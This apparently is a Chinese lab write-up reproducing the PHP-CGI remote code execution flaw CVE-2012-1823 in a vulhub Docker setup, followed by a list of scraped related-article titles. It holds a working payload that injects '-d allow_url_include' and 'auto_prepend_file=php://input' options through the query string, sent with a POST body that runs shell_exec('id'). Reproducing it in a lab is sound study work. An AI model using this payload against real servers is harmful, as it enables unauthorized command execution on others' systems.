PHP-CGI远程代码执行

漏洞利用知识:

CGI模式下的参数:

-c 指定php.ini文件的位置

-n 不要加载php.ini文件

-d 指定配置项

-b 启动fastcgi进程

-s 显示文件源码

-T 执行指定次该文件

-h和-? 显示帮助

环境搭建:

这里采用vulhub环境,参考文件

漏洞利用:

启动漏洞环境

进入 CVE-2012-1823
启动

sudo docker-compose up

查看正在运行的docker容器

docker ps

访问一下index.php,没问题

-s显示源码

-d执行命令

?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

<?php echo shell_exec('id');?>

用burp抓包修改包(这里要请求方式要改为POST)

返回结果,上传成功。

PHP-CGI远程代码执行相关推荐

  1. JAVA CGI 远程代码执行_Apache Tomcat CVE-2019-0232 远程代码执行漏洞

    2019年4月10日,Apache Tomcat报告了一个漏洞称在windows上运行的Apache Tomcat存在远程代码执行漏洞,漏洞编号为CVE-2019-0232.在Windows平台,远程 ...

  2. cve-2017-12617 tomcat远程代码执行漏洞复现测试

    0x00前情提要 Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操 ...

  3. Drupal 修复远程代码执行漏洞

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 周三,Drupal 内容管理系统 (CMS) 发布更新,修复了和不正确清理所上传文件名称有关的一个远程代码执行漏洞 (CVE-2020 ...

  4. IoT僵尸网络Miori通过ThinkPHP远程代码执行漏洞进行传播

    转发开心,送你们一些IOT默认凭据表 Mirai变种"Miori"出现,通过Thinkphp5远程代码执行(RCE)漏洞传播 漏洞详细分析: Thinkphp5 远程代码执行漏洞事 ...

  5. 墨者学院—Webmin未经身份验证的远程代码执行(简单复习)

    墨者学院-Webmin未经身份验证的远程代码执行(简单复习) 背景描述: Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理 ...

  6. Webmin未经身份验证的远程代码执行

    [墨者学院]--Webmin未经身份验证的远程代码执行 做题前看看大佬写的漏洞原理:[https://blog.csdn.net/qq_43380549/article/details/1000112 ...

  7. 注意!多款智能家居Hub存在远程代码执行漏洞

    近日,有研究团队在三个不同的家庭集线器– Fibaro Home Center Lite,Homematic中央控制单元(CCU2)和eLAN-RF-003中发现了许多严重的安全漏洞.这些设备用于监视 ...

  8. 复现CVE-2022-10270(向日葵远程代码执行漏洞)

    目录 引言 漏洞描述 影响版本: 原理: 环境搭建 手动复现 脚本复现 修复建议 引言 本文内容仅供学习参考,若读者利用本文内容做出违法行为,笔者不提供担保!!! 漏洞描述 向日葵是一款免费的,集远程 ...

  9. 【漏洞复现】CNVD-2022-10270向日葵远程代码执行

    声明:本文内容仅供学习参考 目录 声明:本文内容仅供学习参考 一.漏洞介绍 二.影响范围 三.漏洞复现 复现思路一: 复现思路二: 一.漏洞介绍 向日葵远程控制是上海贝锐信息科技股份有限公司开发的一款 ...

最新文章

  1. VoxelNet阅读笔记
  2. Tizen SDK 1.0 Larkspur 安装指南(ubuntu)
  3. git 克隆远端分支,关联到本地,修改代码并提交到远程分支
  4. 越绿自己,就会越强?
  5. Java高级语法笔记-自定义异常类
  6. fedora yum 安装mysql
  7. 中文版Visual Studio 2008 SP1 智能提示为英文的补丁发布
  8. php js绝对路径,javascript将相对路径转绝对路径示例_基础知识
  9. CNN入门讲解:不一样的Softmax
  10. mac 搭建mysql环境_Mac下MySQL环境搭建的步骤详解
  11. 新生周赛——YZJ的牛肉干
  12. 怎么让程序运行结果里不出现ans(两个特殊例子)
  13. 计算机使用技巧大全 书,总算明白电脑使用技巧大全
  14. writev遇到非阻塞IO
  15. CC2640R2F之配对绑定与解除绑定篇
  16. 计算机二级和英语六级什么时候出成绩,英语四六级口语考试成绩确定标准是什么?成绩何时发布?...
  17. 山东计算机专业民办大学排名,2020年山东最好的民办大学排名
  18. [编程题] 大富翁游戏(美团点评2017秋招)
  19. 困惑与破题:人人喊打的屏幕时间究竟对孩子做了什么?
  20. 华为智慧屏鸿蒙os系统体验,华为智慧屏S Pro体验:告诉你鸿蒙OS有多优秀?

热门文章

  1. json bosn
  2. 逻辑英语结构【重点】
  3. python数据爬取---简单页面的爬取
  4. sweet-alert的swal()出现瞬间自动消失(type:“success”类型)
  5. 二维图形的基本变换与裁剪的变换矩阵
  6. Java课堂笔记第九次428
  7. 功能室计算机室教学计划,计算机室教学计划
  8. java中String和数组的长度
  9. 双重检查锁与单例模式
  10. 编程趣味知识:固执的“and”和变通的“or”